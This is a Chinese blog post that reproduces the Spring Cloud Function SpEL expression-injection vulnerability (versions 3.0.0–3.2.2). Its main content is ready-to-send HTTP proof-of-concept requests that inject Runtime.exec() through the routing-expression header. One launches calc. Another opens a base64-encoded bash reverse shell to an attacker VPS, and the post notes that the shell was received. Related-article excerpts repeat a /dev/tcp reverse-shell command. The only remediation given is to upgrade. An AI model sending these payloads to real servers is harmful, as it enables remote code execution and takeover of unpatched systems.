关于Spring Cloud 表达式注入漏洞——分析复现

于 2024-09-12 20:04:17 发布
阅读量92 收藏 5
点赞数 1
分类专栏: 漏洞复现~ 文章标签: spring cloud spring 后端 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuwenshequ/article/details/142184812
版权
更多漏洞分析复现,可前往无问社区查看icon-default.png?t=O83Ahttp://www.wwlib.cn/index.php/artread/artid/5175.html
一、漏洞成因

近期,Spring Cloud官方发布了一则安全公告,修复了一个Spring Cloud Function中的 SPEL表达式注入漏洞。该漏洞是由于Spring Cloud Function中RoutingFunction类的 apply方法将请求头中spring.cloud.function.routing-expression传入的参数值作为SPEL表达式进行处理,攻击者可以通过构造恶意的语句来实现SPEL表达式注入漏洞。

影响版本

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

二、漏洞复现

1、 本地搭建

利用编译好的环境进行本地复现,下载地址:https://github.com/Pizz33/Spring-Cloud-Function-SpEL

图片

图片

POC:

POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
spring.cloud.function.routing-expression: 
T(java.lang.Runtime).getRuntime().exec("calc")
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

test

图片

1、 在线环境反弹shell

vulfocus在线环境反弹shell:http://vulfocus.io/

图片

反弹Shell POC

POST /functionRouter HTTP/1.1
Host: 123.58.236.76:64443
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
spring.cloud.function.routing-expression: 
T(java.lang.Runtime).getRuntime().exec("bash -c 
{echo,YmFzaCAtaSA+Ji9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzY2NjYgMD4mMQo=}|
{base64,-d}|{bash,-i}")
Connection: close
Content-Length: 8
test

vps上进行端口监听

图片

执行POC后,vps上收到了弹回的shell

图片

三、修复方案

升级安全版本

无问社区
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22947 Spring Cloud Gateway SpEL 表达式注入 RCE漏洞复现
afei001
03-05 4838
当启用和暴露 Gateway Actuator 端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
Spring Cloud Function SpEL表达式RCE漏洞复现分析
Palpitate_LL的博客
07-05 740
分析spring-cloud-function可以发现,spring框架的几个由SpEL表达式注入造成的RCE的触发点基本上都很相似,触发类以及触发路由分析对于漏洞挖掘来说都有可以借鉴的地方。
Spring Cloud Function SpEL表达式注入漏洞复现
m0_67391377的博客
08-24 186
Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。
Spring Cloud Function SPEL表达式注入漏洞复现
xhwfa的博客
04-20 3599
漏洞编号:CVE-2022-22963 一、漏洞简述 Spring Cloud Function 是基于Spring Boot的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 在版本3.0.0到当前最新版本3.2.2(commit dc5128b),默
Spring Cloud Function SpEL 表达式命令注入漏洞复现及利用
Tauil的博客
07-26 986
在源码中可以看到,未修改前的代码中spring.cloud.function.routing-expression参数被functionFromExpression接口中的getValue进行处理,该方法使用了StandardEvaluationContext来进行解析SeEL表达式,从而形成了注入漏洞。时,会触发RoutingFunction逻辑,在SpringCloudFunction中,RoutingFunction类的apply方法会将请求头中的。另启一个终端,再终端中输入。...
Spring Cloud Function SPEL表达式注入漏洞
Trouvailless的博客
04-28 471
漏洞描述 Spring框架为现代基于java的企业应用程序(在任何类型的部署平台上)提供了一个全面的编程和配置模型。 Spring Cloud 中的 serveless框架 Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“spring.cloud.function.routing-expression”参数作为 Spel 表达式进行处理,造成Spel表达式注入,攻击者可通过该漏洞执行任意代码。 利用条件 3.0.0.RELEASE
Spring Cloud Function Spel表达式注入漏洞分析
si1ence的博客
04-14 3430
Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。主要影响的版本包括 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
本文将详细探讨一个重要的安全问题——Spring Cloud Gateway Actuator API 的SpEL(Spring Expression Language)表达式注入漏洞(CVE-2022-22947),该漏洞可能导致命令执行,对系统安全构成严重威胁。首先,我们...
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3837
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
spring揭秘19-spring事务01-事务抽象
PacosonSWJTU的博客
09-08 1295
1)spring对事务元素进行抽象, 客户端仅按照统一的编程模型管理事务,而不用关心数据访问技术以及具体要访问什么类型的事务资源;此外:spring事务管理与spring提供的数据访问技术(如JdbcTemplate)进行结合;2)spring事务框架设计的基本原则: 让事务管理逻辑与数据访问逻辑解耦;spring揭秘15-spring集成数据访问技术(orm框架)总结事务隔离级别;isolation;事务传播行为;事务超时时间;timeout;是否为只读事务;readOnly;
Spring05——注解开发定义bean、Spring纯注解开发模式
后端小白个人学习记录
09-08 883
注解开发定义bean、Spring纯注解开发模式
SpringSecurity原理解析(二):认证流程
liang8999的博客
09-08 1021
attemptAuthentication 方法在子类UsernamePasswordAuthenticationFilter 中实现的。attemptAuthentication方法的作用是获取Authentication对象其实就是对应的认证过程,用该AuthenticationProvider的authenticate函数认证,如果认证成功则整个认证过程结束。AuthenticationManager接口中就定义了一个方法authenticate方法,用于处理认证的请求;
基于SpringBoot的旅游管理系统
heye0910032的博客
09-08 399
随着科技的发展,旅游管理系统的信息化成为提升旅游服务效率的关键。本系统采用JSP技术和SpringBoot框架,结合MySQL数据库,旨在实现一个功能全面、操作简便、安全可靠的旅游管理平台。系统通过需求分析、系统设计、功能实现和测试,确保了良好的用户体验和数据处理能力,为旅游业务的现代化管理提供了强有力的技术支持。本研究成功开发了一个基于SpringBoot的旅游管理系统,该系统通过集成多种旅游管理功能,显著提高了旅游服务的效率和质量。系统的用户友好界面和强大的后端功能,使得管理员和用户都能从中受益。
【安全漏洞SpringBoot + SpringSecurity CORS跨域资源共享配置
weixin_42925623的博客
09-05 1586
今天我们就来了解一下这个CROS漏洞,并记录一下在整合了springSecurity这一套安全框架下的springboot系统中如何在后端过滤器中通过正确注册WebMvcConfigurer bean来配置CORS的全局设置,实现对非白名单访问源的拦截。
springboot】父子工程项目搭建
qq_40878316的博客
09-11 287
可以在idea右侧页签栏中点击【Maven】查看父子工程结构及其拥有依赖。2.选择合适的springboot版本,点击【完成】,即创建父工程完毕。2.选择新建Maven工程(注意此处的SDK需与父工程保持一致)1.右键项目名->新建(news)->模块(Module)3.填写子工程模块信息(此处组id与父工程保持一致)可点击右上角设置图标,点击选择【将模块分组】即可。2.子工程编写启动类及controller类。,能正常输入内容,则表示父子工程无问题。1.新建一个spring项目。
基于SpringBoot的多媒体信息共享平台开发
qq_45800365的博客
09-06 274
基于SpringBoot的多媒体信息共享平台开发,java项目。eclipse和idea都能打开运行。推荐环境配置:eclipse/idea jdk1.8 maven mysql前端技术:vue,Ajax,Json后端技术:SpringBoot,MyBatis本系统共分为两个角色:管理员和用户。主要功能有:后台:系统首页个人中心用户管理作品分类管理作品信息管理私聊信息管理系统管理前台:首页作品信息公告信息后台管理个人中心。
springboot】简易模块化开发项目整合MyBatis-plus
最新发布
qq_40878316的博客
09-11 889
接,继续扩展项目。
spring】微服务架构中的VO命名
突围
09-05 254
matchreqvo
SpringBoot SpEL表达式注入漏洞-分析复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值